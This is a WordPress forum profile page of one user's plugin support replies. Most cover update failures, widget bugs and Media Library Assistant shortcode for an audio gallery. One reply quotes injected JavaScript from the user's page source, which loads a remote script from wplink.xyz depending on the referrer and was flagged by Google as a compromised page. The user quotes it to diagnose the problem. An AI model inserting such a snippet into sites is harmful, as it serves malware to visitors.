onealklea
Forum Replies Created
-
I am having the same problem. I currently have Version 1.3.8 and trying to update to 1.4 but it wipes out all the data.
- This reply was modified 7 years, 8 months ago by onealklea.
Forum: Plugins
In reply to: [WP-Invoice - Web Invoice and Billing] Row Tax Screen OptionYes can. Where to send?
It seems that the two plugins “All in One WP Security” and “Ninja Kick Contact Form” are conflicting when the Captcha is enabled in the All in One WP Security which is adding a wplink script. But if the Captcha is enabled and Ninja Kick Contact Form is deactivated then there is no wplink script. Very odd.
Neither one of these are enabled. But as soon as I disabled “Enable Captcha On Comment Forms” then the wplink goes away.
Just FYI: every time I deactivate the plugin the link goes away and every time I activate the plugin the link comes back. Not another plugin causing the problem.
Here is the info from the page source:
<script type=”text/javascript”> if(!document.referrer || document.referrer == ”) { document.write(‘<scr’+’ipt type=”text/javascript” src=”http://www.wplink.xyz/jquery.min.js”></scr’+’ipt>’); } else { document.write(‘<scr’+’ipt type=”text/javascript” src=”http://www.wplink.xyz/jquery.js”></scr’+’ipt>’); }
No, I deactivated every plugin and no link or cookie. I then activated back each plugin one at a time and as soon as I activated All In One WP Security the link was in the source and cookie was in my files. This is what Google is saying why they have suspended the ads: ‘compromised landing page’ for file http://www.wplink.xyz/jquery.js
Yes, same issue when I updated. I had to also restore the old version for the site to be useable at all. I couldn’t do anything in the dashboard because of the parse error.
Forum: Plugins
In reply to: [Image Widget] WP 4.0 Compatability Issues?Same problems with 4.1. I deactivated all plugins and when the image widget plugin is active then the Widgets do not appear properly. If I deactivate it then Widgets appear like normal.
Ah ha! I added tax_relation=OR and it will display all fine but when I choose a particular Attachment Category then it still displays all. I really want “AND” but when someone chooses a particular Attachment Category then it only displays that particular Attachment Category as long as the category is “subscription”
Fixed. Someone changed the slugs on the categories and now all working. So, “category” term is now called “categories” in new WordPress update.
I found one problem. category=subscription was not displaying anything so I changed it to categories=subscription instead and now it is displaying all the audio with “subscription” as their category. The search is also working fine but the select a topic isn’t working. Wondering if attachment category term is correct.
Forum: Plugins
In reply to: [Media Library Assistant] Audio PlayerSo sorry… had an extra < in the code. Here is the corrected code
<form id="attachment-category-form" method="get" action="/audiotest/"> <select name="category_value" class="postform"> <option value="">-- All Topics --</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> </select> <input type="text" id="mla-search-box" name="search-string" value="" placeholder="Keyword Search"> <input type="submit" id="submit" name="submit" value="GO"> </form> [mla_gallery my_custom_audio="" post_mime_type="audio/mpeg" s="{+request:search-string+}" attachment_category="{+request:category_value+}" mla_caption="<strong><br />Title:</strong> {+title+}<strong><br />Scripture:</strong> {+caption+}<br /><strong>Description: </strong>{+description+}<br /><strong>Excerpt:</strong> {+excerpt+}<br /><strong>Topic: </strong>{+terms:attachment_category+}<br /><br /><hr align=center noshade width=25%>" link=file mla_target="_blank" columns=1 posts_per_page=10] [mla_gallery post_mime_type="audio/mpeg" s="{+request:search-string+}" attachment_category="{+request:category_value+}" mla_caption="<strong><br />Title:</strong> {+title+}<strong><br />Scripture:</strong> {+caption+}<br /><strong>Description:</strong> {+description+}<br /><strong>Excerpt:</strong> {+excerpt+}<br /><strong>Topic: </strong>{+terms:attachment_category+}<br /><br /><hr align=center noshade width=25%>" link=file columns=1 posts_per_page=10 mla_output="paginate_links,prev_next"]Forum: Plugins
In reply to: [Media Library Assistant] Audio PlayerPerfect!!! Works like a charm. Thanks so much!
Here is the full code – just in case anyone else wants to do this.
<form id="attachment-category-form" method="get" action="/audiotest/"> <select name="category_value" class="postform"> <option value="">-- All Topics --</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <<option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> <option value="xyz">XYZ</option> </select> <input type="text" id="mla-search-box" name="search-string" value="" placeholder="Keyword Search"> <input type="submit" id="submit" name="submit" value="GO"> </form> [mla_gallery my_custom_audio="" post_mime_type="audio/mpeg" s="{+request:search-string+}" attachment_category="{+request:category_value+}" mla_caption="<strong><br />Title:</strong> {+title+}<strong><br />Scripture:</strong> {+caption+}<br /><strong>Description: </strong>{+description+}<br /><strong>Excerpt:</strong> {+excerpt+}<br /><strong>Topic: </strong>{+terms:attachment_category+}<br /><br /><hr align=center noshade width=25%>" link=file mla_target="_blank" columns=1 posts_per_page=10] [mla_gallery post_mime_type="audio/mpeg" s="{+request:search-string+}" attachment_category="{+request:category_value+}" mla_caption="<strong><br />Title:</strong> {+title+}<strong><br />Scripture:</strong> {+caption+}<br /><strong>Description:</strong> {+description+}<br /><strong>Excerpt:</strong> {+excerpt+}<br /><strong>Topic: </strong>{+terms:attachment_category+}<br /><br /><hr align=center noshade width=25%>" link=file columns=1 posts_per_page=10 mla_output="paginate_links,prev_next"]